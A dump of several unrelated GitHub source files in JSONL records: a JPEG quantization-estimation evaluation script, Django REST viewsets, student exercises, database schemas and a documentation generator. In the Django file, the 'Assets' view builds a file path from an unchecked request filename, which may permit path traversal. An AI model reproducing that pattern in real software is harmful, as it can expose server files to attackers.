estimation of double JPEG images via a classification-like architecture}, \n Benedetta Tondi and Andrea Costanzo and Dequ Huang and Bin Li\n ArXiv preprint: https://arxiv.org/abs/2012.00468\n\n\"\"\"\n\nimport configuration as cfg\nimport os\nimport numpy as np\nfrom batch import evaluate_model_v20, evaluate_model\nfrom utils import plot_average_accuracy, rearrange_zigzag_array, read_dataset_wfilter_jpeg_grid, qf1_qf2_coefficients_map, max_min_coefficient\nfrom networks import custom_categorical, custom_softmax_activation, custom_two_terms_loss_wrapper, custom_mse_wrapper\nfrom tensorflow.keras.models import load_model\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\n\n\nif __name__ == '__main__':\n\n save_figures = False\n save_data = False\n suppress_csv = True\n\n # Version 2 has two-terms loss, version 1 has one-term loss\n version = '1.0' # 2.0\n mode = 'aligned' # 'misaligned'\n\n # Test model\n if version == '2.0':\n\n used_cnn = 'new_model'\n model_file = 'models/model_QF1_60-98-s1-2-term-loss-from-86+20+4+30+ep-30-coef-15/model_ep29.h5'\n # model_file = 'models/model_QF1_55-98-s1-2-term-loss-from-86+53-ep-30-coef-15/model_ep29.h5'\n output_txt = 'results/results_QF1_60-98-s1-2-term-loss-from-86+20+4+30+ep-30-coef-15/RAISE8K_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n # output_txt = 'results/results_QF1_55-98-s1-2-term-loss-from-86+53-ep-30-coef-15/QF2_80_RAISE8K_MIXED_DATASET_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n\n elif version == '1.0':\n\n used_cnn = 'old_model'\n model_file = 'models/model_OriginalPaperModels/DNN90_60LOG.h5'\n # model_file = 'models/model_OriginalPaperModels/DNN80_LC20_From90.h5'\n output_txt = 'results/results_OriginalPaperModels/RAISE8K_QF1<>QF2_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n # output_txt = 'results/results_OriginalPaperModels/QF2_80_RAISE8K_MIXED_DATASET_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n\n # Output NPY for average accuracy for each coefficient\n per_coeff_acc_file = 'QF2_90_RAISE8K_Average_accuracy_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n per_coeff_mse_file = 'QF2_90_RAISE8K_Average_mse_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n\n per_coeff_acc_file_1 = 'QF2_90_RAISE8K_QF1_smaller_QF2_Average_accuracy_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n per_coeff_acc_file_2 = 'QF2_90_RAISE8K_QF1_larger_QF2_Average_accuracy_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n\n per_coeff_mse_file_1 = 'QF2_90_RAISE8K_QF1_smaller_QF2_Average_mse_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n per_coeff_mse_file_2 = 'QF2_90_RAISE8K_QF1_larger_QF2_Average_mse_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n\n # Data file\n csv_file = os.path.join(cfg.out_test_dir, cfg.test_csv)\n\n # Load the table linking each pair of JPEG quality factors to the corresponding Q's coefficients\n qf_map = qf1_qf2_coefficients_map(csv_file=csv_file)\n\n # Max value for coefficients\n max_coeffs, _ = max_min_coefficient(quality_range=(50, 100),\n n_coeffs=cfg.max_no_Q_coefs,\n zig_zag_order=cfg.zig_zag_order)\n\n # Load model\n if version == '1.0':\n model = load_model(model_file,\n custom_objects=({'custom_softmax': custom_softmax_activation(max_coeffs),\n 'custom_categorical': custom_categorical(max_coeffs)}))\n elif version == '2.0':\n model = load_model(model_file,\n custom_objects=({'custom_softmax': custom_softmax_activation(max_coeffs),\n 'custom_two_terms_loss_wrapper': custom_two_terms_loss_wrapper(max_coeffs, cfg.mse_weight),\n 'custom_mse': custom_mse_wrapper(max_coeffs)}))\n\n # Read CSV with test dataset for each (QF1, QF2) pair and gris is aligned / misaligned\n arr_accuracy = []\n arr_mse = []\n arr_nmse = []\n\n avg_acc_matrix = np.zeros((1, cfg.max_no_Q_coefs))\n avg_acc_matrix_1 = np.zeros((1, cfg.max_no_Q_coefs))\n avg_acc_matrix_2 = np.zeros((1, cfg.max_no_Q_coefs))\n\n avg_mse_matrix = np.zeros((1, cfg.max_no_Q_coefs))\n avg_mse_matrix_1 = np.zeros((1, cfg.max_no_Q_coefs))\n avg_mse_matrix_2 = np.zeros((1, cfg.max_no_Q_coefs))\n\n tot_pairs_smaller = 0\n tot_pairs_larger = 0\n tot_pairs_with_values = 0\n for qf_pair in cfg.q_factors:\n\n test_images, test_labels, test_jpeg_pairs = read_dataset_wfilter_jpeg_grid(csv_file=csv_file,\n qf_filter=qf_pair,\n grid_filter=mode)\n print('Found {} {} images'.format(len(test_images), mode))\n if len(test_images) == 0:\n print('WARNING! NO RECORD FOR {}, {}'.format(qf_pair[0], qf_pair[1]))\n arr_accuracy.append(-1)\n arr_mse.append(-1)\n arr_nmse.append(-1)\n with open(output_txt, 'a') as fp:\n fp.write('-' * 80 + '\\n')\n fp.write('QF1 = {} QF2 = {}\\n'.format(qf_pair[0], qf_pair[1]))\n fp.write('-' * 80 + '\\n')\n fp.write('Test average MSE: {:3.4f}\\n'.format(-1))\n fp.write('Test average normalised MSE: {:3.4f}\\n'.format(-1))\n fp.write('Test accuracy: {:3.4f}\\n'.format(-1))\n fp.write('-'*80 + '\\n')\n fp.write('\\n')\n continue\n else:\n tot_pairs_with_values+=1\n\n # Test model performance\n csv_output = 'results/test_results_{}_{}_{}.csv'.format(mode.upper(), qf_pair[0], qf_pair[1])\n\n print('Version: {}'.format(version))\n if version == '2.0':\n eval_fun = evaluate_model_v20\n else:\n eval_fun = evaluate_model\n\n avg_mse, avg_nmse, test_accuracy, accuracy_matrix, mse_matrix = \\\n eval_fun(model=model,\n images=test_images,\n labels=test_labels,\n qfactors=test_jpeg_pairs,\n qf_map=qf_map,\n target_size=cfg.block_size,\n max_samples=None,\n coeff_map=max_coeffs,\n csv_companion=csv_output)\n\n # If we do not need the CSV files\n if suppress_csv:\n os.remove(csv_output)\n\n # store data for each pair to average later over all QFs\n arr_accuracy.append(test_accuracy)\n arr_mse.append(avg_mse)\n arr_nmse.append(avg_nmse)\n\n avg_acc_matrix += accuracy_matrix\n avg_mse_matrix += mse_matrix\n\n if qf_pair[0] < qf_pair[1]:\n tot_pairs_smaller += 1\n avg_acc_matrix_1 += accuracy_matrix\n avg_mse_matrix_1 += mse_matrix\n else:\n tot_pairs_larger += 1\n avg_acc_matrix_2 += accuracy_matrix\n avg_mse_matrix_2 += mse_matrix\n\n\n # Plot average accuracy (over all images) for each coefficient\n # if save_figures:\n # plot_file_acc = 'results/acc_x_coeff_{}_{}_{}.png'.format(mode.upper(), qf_pair[0], qf_pair[1])\n # plot_average_accuracy(rearrange_zigzag_array(accuracy_matrix, 8), savefile=plot_file_acc)\n\n # if save_data:\n # np.save('accuracy_{}_{}.npy'.format(mode.upper(), qf_pair[1]), arr_accuracy)\n\n print('JPEG: {} QF1 = {} QF2 = {}'.format(mode.upper(), qf_pair[0], qf_pair[1]))\n print('Test average MSE: {:3.4f}'.format(avg_mse))\n print('Test average normalised MSE: {:3.4f}'.format(avg_nmse))\n print('Test accuracy: {:3.4f}'.format(test_accuracy))\n print('\\n')\n\n with open(output_txt, 'a') as fp:\n fp.write('-' * 80 + '\\n')\n fp.write('QF1 = {} QF2 = {}\\n'.format(qf_pair[0], qf_pair[1]))\n fp.write('-' * 80 + '\\n')\n fp.write('Test average MSE: {:3.4f}\\n'.format(avg_mse))\n fp.write('Test average normalised MSE: {:3.4f}\\n'.format(avg_nmse))\n fp.write('Test accuracy: {:3.4f}\\n'.format(test_accuracy))\n fp.write('-'*80 + '\\n')\n fp.write('\\n')\n\n # Average coefficient accuracy / MSE over all (QF1, QF2) pairs\n avg_acc_matrix = avg_acc_matrix / tot_pairs_with_values\n avg_mse_matrix = avg_mse_matrix / tot_pairs_with_values\n\n avg_acc_matrix_1 = avg_acc_matrix_1 / tot_pairs_smaller\n avg_mse_matrix_1 = avg_mse_matrix_1 / tot_pairs_smaller\n\n avg_acc_matrix_2 = avg_acc_matrix_2 / tot_pairs_larger\n avg_mse_matrix_2 = avg_mse_matrix_2 / tot_pairs_larger\n\n np.save(per_coeff_acc_file, avg_acc_matrix)\n np.save(per_coeff_mse_file, avg_mse_matrix)\n\n np.save(per_coeff_acc_file_1, avg_acc_matrix_1)\n np.save(per_coeff_mse_file_1, avg_mse_matrix_1)\n\n np.save(per_coeff_acc_file_2, avg_acc_matrix_2)\n np.save(per_coeff_mse_file_2, avg_mse_matrix_2)\n","repo_name":"andreacos/BoostingCNN-Jpeg-Primary-Quantization-Matrix-Estimation","sub_path":"predict_alignment.py","file_name":"predict_alignment.py","file_ext":"py","file_size_in_byte":9998,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33564694166","text":"import requests\nimport json\n\n\nclass Schema:\n def __init__(\n self,\n gc2\n ):\n self.__gc2 = gc2\n self.__url = f\"{gc2.url}/schema\"\n self.data = None\n\n def get(self):\n resp = requests.get(f\"{self.__url}\", headers=self.__gc2.headers)\n if resp.status_code != 200:\n raise Exception(f\"Error {resp.status_code}: {resp.text}\")\n else:\n self.data = json.loads(resp.text)[\"data\"]\n return\n","repo_name":"mapcentia/gc2-python-client","sub_path":"gc2/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72702913768","text":"from urllib import request\nfrom django.db.models import Q\nfrom rest_framework.decorators import action\nfrom rest_framework import permissions, viewsets, status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt import views\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework_simplejwt.exceptions import TokenError, InvalidToken\n\nfrom restapi.models import Project, Comment, User\nfrom restapi.permissions import IsOwnerOrReadOnly, IsProjectUser\nfrom restapi.serializers import ProjectSerializer, CommentSerializer, UserSerializer, LoginSerializer, RegisterSerializer, PasswordSerializer\n\nfrom django.views import View\nfrom django.http import HttpResponse, HttpResponseNotFound\nimport os, sys\nimport datetime\n\n\nclass LoginViewSet(viewsets.ModelViewSet, views.TokenObtainPairView):\n serializer_class = LoginSerializer\n permission_classes = (AllowAny,)\n http_method_names = ['post']\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n try:\n serializer.is_valid(raise_exception=True)\n except TokenError as e:\n raise InvalidToken(e.args[0])\n\n return Response(serializer.validated_data, status=status.HTTP_200_OK)\n\n\nclass RegistrationViewSet(viewsets.ModelViewSet, views.TokenObtainPairView):\n serializer_class = RegisterSerializer\n permission_classes = (AllowAny,)\n http_method_names = ['post']\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n serializer.is_valid(raise_exception=True)\n user = serializer.save()\n refresh = RefreshToken.for_user(user)\n res = {\n \"refresh\": str(refresh),\n \"access\": str(refresh.access_token),\n }\n\n return Response({\n \"user\": serializer.data,\n \"refresh\": res[\"refresh\"],\n \"token\": res[\"access\"]\n }, status=status.HTTP_201_CREATED)\n\n\nclass RefreshViewSet(viewsets.ViewSet, views.TokenRefreshView):\n permission_classes = (AllowAny,)\n http_method_names = ['post']\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n try:\n serializer.is_valid(raise_exception=True)\n except TokenError as e:\n raise InvalidToken(e.args[0])\n\n return Response(serializer.validated_data, status=status.HTTP_200_OK)\n\n\nclass ProjectViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated, IsProjectUser)\n serializer_class = ProjectSerializer\n queryset = Project.objects.all()\n\n @action(detail=True, methods=['post'])\n def add_comment(self, request, pk=None):\n project = self.get_object()\n owner = request.user\n content = request.data['description']\n comment = Comment(project=project, owner=owner, created=datetime.datetime.now(), content=content)\n comment.save()\n queryset = Project.objects.get(id=project.id)\n serializer = ProjectSerializer(queryset)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def perform_create(self, serializer):\n serializer.save(owner=self.request.user)\n\n def list(self, request, *args, **kwargs):\n queryset = Project.objects.filter(Q(owner=request.user.id) | Q(users__user=request.user.id)).distinct()\n serializer = ProjectSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n\n def perform_create(self, serializer):\n serializer.save(owner=self.request.user)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)\n queryset = User.objects.all()\n serializer_class = UserSerializer \n\n @action(detail=True, methods=['post'])\n def set_password(self, request, pk=None):\n user = self.get_object()\n serializer = PasswordSerializer(data=request.data)\n if serializer.is_valid():\n user.set_password(serializer.validated_data['password'])\n user.save()\n return Response({'status': 'password set'})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# Add this CBV\nclass Assets(View):\n\n def get(self, _request, filename):\n path = os.path.join(os.path.dirname(__file__), 'static', filename)\n\n if os.path.isfile(path):\n with open(path, 'rb') as file:\n return HttpResponse(file.read(), content_type='application/javascript')\n else:\n return HttpResponseNotFound()","repo_name":"GredziszewskiK/3xp","sub_path":"restapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74716461287","text":"import copy\n\ndef menu():\n print(\"MENU\")\n while(True):\n print(\"Indique operacion:\")\n print( \"1) SIMULAR ENCRIPTAR CONJUNTO DE MENSAJES.\\n\"\n \"2) SIMULAR RECIBIR Y DESENCRIPTAR CONJUNTO DE MENSAJES.\\n\"\n \"3) VER ESTADO ACTUAL.\\n\"\n \"4) REINICIAR\\n\"\n \"0) SALIR.\\n\")\n op = input(\"\\t\")\n if op not in (\"1\",\"2\",\"3\",\"4\",\"0\"):\n print(\"ERROR - Seleccion erronea. REINTENTAR\")\n continue\n else:\n return op\n\ndef control_msg(msg: str):\n '''\n Controls that each bracket has its complementary bracket (at the \n correct order)\n ex: {msg} returns True\n {{msg} returns False\n {msg{msg} } returns False\n {msg}{msg} returns True\n '''\n bracket_opened = False\n for x in msg:\n if x == \"{\" and bracket_opened == False:\n bracket_opened = True\n elif x == \"{\" and bracket_opened == True:\n print(\"Uso incorrecto de caracter '{'\")\n return False\n if x == \"}\" and bracket_opened == False:\n print(\"Uso incorrecto de caracter '}'\")\n return False\n elif x == \"}\" and bracket_opened == True:\n bracket_opened = False\n if x == \"&\" and bracket_opened == True:\n print(\"Uso incorrecto de caracter '&'.\")\n return False\n if bracket_opened == False:\n return True\n else:\n print(\"Uso incorrecto de caracter '{'\")\n return False\n\ndef encrypt():\n user_counter = msg_counter = 1\n msg_aux1 = msg_final = \"\"\n while(True):\n print(f\"USUARIO {user_counter} INGRESE SU MENSAJE {msg_counter}:\"\n \" (NO USE LOS CARACTERES '{', '}' NI '&'\")\n msg_temp = input(\"\\t\")\n if \"{\" in msg_temp or \"}\" in msg_temp or \"&\" in msg_temp:\n print(\"Mensaje invalido. Reintentar\")\n continue\n msg_temp = \"{\" + msg_temp + \"}\"\n msg_aux1 = msg_aux1 + msg_temp\n print(\"Desea agregar otro mensaje? (ENTER para SI, 'N' para NO)\")\n if input(\"\\t\").upper() == 'N':\n user_counter+=1\n msg_counter = 1\n msg_final = msg_final + msg_aux1 \n print(\"Desea agregar otros mensajes para otro usuario?\"\n \" (ENTER para SI, 'N' para NO)\")\n if input(\"\\t\").upper() == 'N':\n # tuple_aux = msg_final.rpartition(\"&\")\n # msg_final = tuple_aux[0] # deletes last '&'\n print(\"MENSAJE/S ENCRIPTADO CORRECTAMENTE\")\n print(f\"Mensaje/s: \\n\\t{msg_final}\")\n return msg_final, True\n msg_final = msg_final + \"&\"\n msg_aux1 = \"\"\n else:\n msg_counter += 1\n\ndef decrypt(encrypted_msg: str):\n if not control_msg(encrypted_msg):\n print(\"EL MENSAJE ESTA CORROMPIDO\")\n return False\n list_encrypted_msg = encrypted_msg.split(\"&\")\n print(f\"Hay {len(list_encrypted_msg)} usuarios con mensajes encriptados.\")\n view_list = copy.deepcopy(list_encrypted_msg)\n i=0\n for user_encrp_msgs in view_list:\n i+=1\n message_aux = user_encrp_msgs.replace(\"{\",\"\")\n message_aux = message_aux.split(\"}\")\n message_aux.pop()\n #messages = user_encrp_msgs.partition(\"}\")\n print(f\"Usuario {i}: posee {len(message_aux)} mensajes.\")\n print(f\"Esos mensajes son: {message_aux}\")\n return False","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/ejercicios_complementarios/04_listas_tuplas_diccionarios/mas_complicado/ej_f/def_ej_f.py","file_name":"def_ej_f.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30644072399","text":"from turtle import *\nimport math\n\n# Name your Turtle.\nt = Turtle()\n\n# Set Up your screen and starting position.\nsetup(500,300)\nx_pos = -250\ny_pos = -150\nt.setposition(x_pos, y_pos)\n\n### Write your code below:\n\n\n\n\n\n\n# Close window on click.\nexitonclick()\n","repo_name":"GirlsFirst/SIP-2017-starter","sub_path":"Unit1_Foundations/shapes2/pythonshapes_starter.py","file_name":"pythonshapes_starter.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"43651543192","text":"from ftxdata import getftxdata\n\nclass Coin():\n def __init__(self, ticker):\n self.__data = getftxdata('https://ftx.com/api/futures/' + ticker)\n self.__ticker = ticker\n self.__price = self.__data['mark']\n self.__percent = str(round(self.__data['change24h']*100, 2)) + '%'\n\n def get(self, attribute):\n if attribute == 'ticker':\n return self.__ticker\n elif attribute == 'price':\n return self.__price\n elif attribute == '%':\n return self.__percent\n else:\n return self.__data","repo_name":"titopotito/cryptofuturesGUI","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8047028679","text":"from sqlalchemy import (\n Table,\n Column,\n Integer,\n String,\n MetaData,\n Float,\n Date,\n)\nfrom sqlalchemy import create_engine\n\n#%% Table names\nOIL_PROD_TABLE = \"oil_production\"\nGAS_PROD_TABLE = \"gas_production\"\nLEASE_TABLE = \"lease\"\nWELLS_TABLE = \"wells\"\nTOPS_TABLE = \"tops\"\n#%% Specify columns to drop from the data sources\nDROP_PROD_COLS = [\n \"LEASE\",\n \"DOR_CODE\",\n \"API_NUMBER\",\n \"FIELD\",\n \"PRODUCING_ZONE\",\n \"OPERATOR\",\n \"COUNTY\",\n \"TOWNSHIP\",\n \"TWN_DIR\",\n \"RANGE\",\n \"RANGE_DIR\",\n \"SECTION\",\n \"SPOT\",\n \"LATITUDE\",\n \"LONGITUDE\",\n \"PRODUCT\",\n \"URL\",\n]\n\nDROP_LEASE_COLS = [\n \"TOWNSHIP\",\n \"TWN_DIR\",\n \"RANGE\",\n \"RANGE_DIR\",\n \"SECTION\",\n \"SPOT\",\n]\n\nDROP_WELL_COLS = [\n \"TOWNSHIP\",\n \"TWN_DIR\",\n \"RANGE\",\n \"RANGE_DIR\",\n \"SECTION\",\n \"SPOT\",\n \"FEET_NORTH\",\n \"FEET_EAST\",\n \"FOOT_REF\",\n \"IP_OIL\",\n \"IP_GAS\",\n \"IP_WATER\",\n \"OIL_KID\",\n \"OIL_DOR_ID\",\n \"GAS_KID\",\n \"GAS_DOR_ID\",\n \"KCC_PERMIT\",\n]\n\nDROP_TOPS_COLS = [\n \"API_NUMBER\",\n \"API_NUM_NODASH\",\n \"ELEVATION\",\n \"ELEV_REF\",\n]\n#%% Create the oil_production table\nmeta = MetaData()\noil_production = Table(\n OIL_PROD_TABLE,\n meta,\n Column(\"LEASE_KID\", Integer, primary_key=True),\n Column(\"DATE\", Date, primary_key=True),\n Column(\"WELLS\", Integer),\n Column(\"PRODUCTION\", Float),\n)\n#%% Create the gas_production table\ngas_production = Table(\n GAS_PROD_TABLE,\n meta,\n Column(\"LEASE_KID\", Integer, primary_key=True),\n Column(\"DATE\", Date, primary_key=True),\n Column(\"WELLS\", Integer),\n Column(\"PRODUCTION\", Float),\n)\n#%% Create the lease table\nlease = Table(\n LEASE_TABLE,\n meta,\n Column(\"LEASE_KID\", Integer, primary_key=True),\n Column(\"LEASE\", String),\n Column(\"DOR_CODE\", Integer),\n Column(\"API_NUMBER\", String),\n Column(\"OPERATOR\", String),\n Column(\"COUNTY\", String),\n Column(\"LATITUDE\", Float),\n Column(\"LONGITUDE\", Float),\n Column(\"PRODUCES\", String),\n Column(\"PRODUCTION\", Float),\n Column(\"YEAR_START\", Integer),\n Column(\"YEAR_STOP\", Integer),\n Column(\"URL\", String),\n)\n#%% Create wells table\nwells = Table(\n WELLS_TABLE,\n meta,\n Column(\"KID\", Integer, primary_key=True),\n Column(\"API_NUMBER\", String),\n Column(\"API_NUM_NODASH\", String),\n Column(\"LEASE\", String),\n Column(\"WELL\", String),\n Column(\"FIELD\", String),\n Column(\"LATITUDE\", Float),\n Column(\"LONGITUDE\", Float),\n Column(\"LONG_LAT_SOURCE\", String),\n Column(\"ORIG_OPERATOR\", String),\n Column(\"CURR_OPERATOR\", String),\n Column(\"ELEVATION\", Float),\n Column(\"ELEV_REF\", String),\n Column(\"DEPTH\", Float),\n Column(\"FORMATION_AT_TOTAL_DEPTH\", String),\n Column(\"PRODUCE_FORM\", String),\n Column(\"PERMIT\", Date),\n Column(\"SPUD\", Date),\n Column(\"COMPLETION\", Date),\n Column(\"PLUGGING\", Date),\n Column(\"MODIFIED\", Date),\n Column(\"STATUS\", String),\n Column(\"STATUS2\", String),\n Column(\"COMMENTS\", String),\n)\n#%% Create tops table\ntops = Table(\n TOPS_TABLE,\n meta,\n Column(\"KID\", Integer, primary_key=True),\n Column(\"FORMATION\", String, primary_key=True),\n Column(\"LONGITUDE\", Float),\n Column(\"LATITUDE\", Float),\n Column(\"TOP\", Float),\n Column(\"BASE\", Float),\n Column(\"SOURCE\", String),\n Column(\"UPDATED\", Date),\n Column(\"OLD_FORMATION\", String),\n)\n","repo_name":"Energy-DVA/energy","sub_path":"_1_analysis/db_schema.py","file_name":"db_schema.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271452967","text":"import argparse\nimport os\nimport re\n\nimport yaml\nfrom easydict import EasyDict as edict\nfrom termcolor import cprint\n\n__all__ = [\n \"api_generator\",\n]\n\ntitle_list = [\"=\", \"-\", \"^\", \"*\"]\nmax_depth_title = 3\n\n\ndef add_title_to_write_msg(write_msg, this_title, title_msg):\n write_msg.append(this_title + \"\\n\")\n write_msg.append(\"\".join(title_msg * len(this_title)) + \"\\n\")\n write_msg.append(\"\\n\")\n return write_msg\n\n\ndef add_to_write_api(write_api, currentmodule, miss_in_path):\n api_str1 = \".. automodule:: \"\n api_str2 = \" :members:\"\n api_str3 = \" :exclude-members: \"\n write_api.append(api_str1 + currentmodule + \"\\n\")\n write_api.append(api_str2 + \"\\n\")\n if len(miss_in_path):\n write_api.append(api_str3 + (\", \".join(miss_in_path)) + \"\\n\")\n write_api.append(\"\\n\")\n return write_api\n\n\ndef add_to_write_msg(write_msg, currentmodule, keep_in_all):\n module_str1 = \".. py:currentmodule:: \"\n module_str2 = \".. autosummary::\"\n module_str3 = \" :nosignatures:\"\n write_msg.append(module_str1 + currentmodule + \"\\n\")\n write_msg.append(\"\\n\")\n write_msg.append(module_str2 + \"\\n\")\n write_msg.append(module_str3 + \"\\n\")\n write_msg.append(\"\\n\")\n for module in keep_in_all:\n write_msg.append(\" \" + module + \"\\n\")\n write_msg.append(\"\\n\")\n return write_msg\n\n\ndef search_dir_files(\n path, title_pro, miss_dir, write_msg, write_api, first_flag=False\n):\n all_dir_file = os.listdir(path)\n dirs = []\n files = []\n for item in all_dir_file:\n if item in miss_dir:\n continue\n if os.path.isfile(os.path.join(path, item)):\n files.append(item)\n else:\n dirs.append(item)\n\n path_split = path.split(\"/\")\n cap_idx = path_split.index(\"cap\")\n currentmodule = \".\".join(path_split[cap_idx:])\n dirs_keep = []\n miss_in_path = []\n\n this_title = path_split[-1]\n if first_flag:\n this_title = this_title.capitalize()\n\n if title_pro > max_depth_title:\n title_pro = max_depth_title\n this_title = \".\".join(path_split[cap_idx + max_depth_title :])\n title_msg = title_list[title_pro]\n\n if \"__init__.py\" in files:\n init_infos = open(os.path.join(path, \"__init__.py\"), \"r\").readlines()\n in_all_flag = False\n keep_in_all = []\n num_flag = 0\n for init_info in init_infos:\n if \"__all__\" in init_info:\n in_all_flag = True\n if in_all_flag:\n num_flag += init_info.count(\"[\")\n num_flag -= init_info.count(\"]\")\n\n init_info_strip = init_info.strip()\n init_info_strip = re.findall('[\"](.*?)[\"]', init_info_strip)\n for init_info_tmp in init_info_strip:\n if init_info_tmp not in miss_dir:\n if init_info_tmp not in dirs:\n keep_in_all.append(init_info_tmp)\n else:\n dirs_keep.append(init_info_tmp)\n else:\n miss_in_path.append(init_info_tmp)\n\n if num_flag == 0:\n in_all_flag = False\n\n if len(keep_in_all) or first_flag:\n add_title_to_write_msg(write_msg, this_title, title_msg)\n\n if len(keep_in_all):\n currentmodule = \".\".join(path_split[cap_idx:])\n\n if currentmodule not in write_api:\n add_to_write_api(write_api, currentmodule, miss_in_path)\n\n add_to_write_msg(write_msg, currentmodule, keep_in_all)\n\n for dir_each in dirs_keep:\n path_each = os.path.join(path, dir_each)\n write_msg, write_api = search_dir_files(\n path_each, title_pro + 1, miss_dir, write_msg, write_api\n )\n\n return write_msg, write_api\n\n\ndef api_generator(\n cap_dir, target_dir, module_name, docstring=None, ignore=None\n):\n title_pro = 0\n write_msg = []\n write_api = []\n api_title = \"API Reference\\n\"\n write_api.append(api_title)\n write_api.append(\"\".join(title_list[1] * len(api_title)) + \"\\n\")\n write_api.append(\"\\n\")\n\n miss_key = []\n if ignore is not None:\n miss_key = ignore\n\n title = \"cap.\" + module_name\n write_msg.append(title + \"\\n\")\n title_msg = title_list[title_pro]\n write_msg.append(\"\".join(title_msg * len(title)) + \"\\n\")\n write_msg.append(\"\\n\")\n\n if docstring is not None:\n write_msg.append(docstring)\n write_msg.append(\"\\n\")\n write_msg.append(\"\\n\")\n\n title_pro += 1\n module_path = os.path.join(cap_dir, module_name)\n write_msg, write_api = search_dir_files(\n module_path, title_pro, miss_key, write_msg, write_api, first_flag=True\n )\n\n write_msg = write_msg + write_api\n output_file_name = os.path.join(target_dir, module_name + \".rst\")\n\n with open(output_file_name, \"w\") as f:\n for line in write_msg:\n f.write(line)\n cprint(f\"[docs] create {output_file_name}\", \"green\")\n\n\ndef main(args):\n file_list = edict(\n yaml.load(open(args.api_module_list, \"r\"), Loader=yaml.SafeLoader)\n )\n\n if not os.path.exists(args.target_dir):\n os.mkdir(args.target_dir)\n\n for module_name, module_keys in file_list.items():\n docstring = None\n ignore = None\n if \"docstring\" in module_keys:\n docstring = module_keys[\"docstring\"][0]\n if \"ignore\" in module_keys:\n ignore = module_keys[\"ignore\"]\n\n cap_dir = os.path.join(args.root, \"cap\")\n api_generator(cap_dir, args.target_dir, module_name, docstring, ignore)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--api-module-list\",\n type=str,\n required=True,\n help=\"The api module and docstring file.\",\n )\n parser.add_argument(\n \"--root\", type=str, default=\"../../\", help=\"The root dir of CAP.\"\n )\n parser.add_argument(\n \"--target-dir\", type=str, default=\"../../docs/source/api_reference\"\n )\n args = parser.parse_args()\n main(args)\n","repo_name":"xingyun-xy/cap","sub_path":"tools/api_generator/api_generator.py","file_name":"api_generator.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42354575872","text":"def pedir_num():\n num = int(input(\"Introduce un numero: \"))\n while num <= 0:\n print(\"El numero no puede ser negativo o 0\")\n num = int(input(\"Introduce un numero positivo mayor que 0\"))\n return num\n\n\ndef cadena_impar(num):\n cadena = \"\"\n num = int(num)\n for i in range(1, num + 1, 2):\n if i == num or i == num - 1:\n cadena += str(i) + \".\"\n else:\n cadena += str(i) + \" - \"\n return cadena\n\n\ndef main():\n numero = pedir_num()\n print(cadena_impar(numero))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IES-Rafael-Alberti/1dam-ejercicios-u2-jfertri853","sub_path":"src/P2_2_EjerciciosIterativos/Ejercicio2_3.py","file_name":"Ejercicio2_3.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17299106179","text":"import sys\r\nimport os\r\nimport numpy as np\r\nimport logging as l\r\nimport datetime\r\n\r\n\r\ndef CreateOutputFile(partial_name, own_directory = False, date = True, overwrite = False):\r\n '''\r\n Create and open a file containing the header described below.\r\n\r\n Parameters:\r\n ----------\r\n partial_name: partial name of the file and the directory that will contain the file.\r\n own_directory: boolean. Default: False.\r\n If true, a new directory './output/_{partial_name}/aaaa-mm-gg_hh.mm.ss' will be created.\r\n If flase, the path of the file will be './output/_{partial_name}'.\r\n date: boolean. Default: 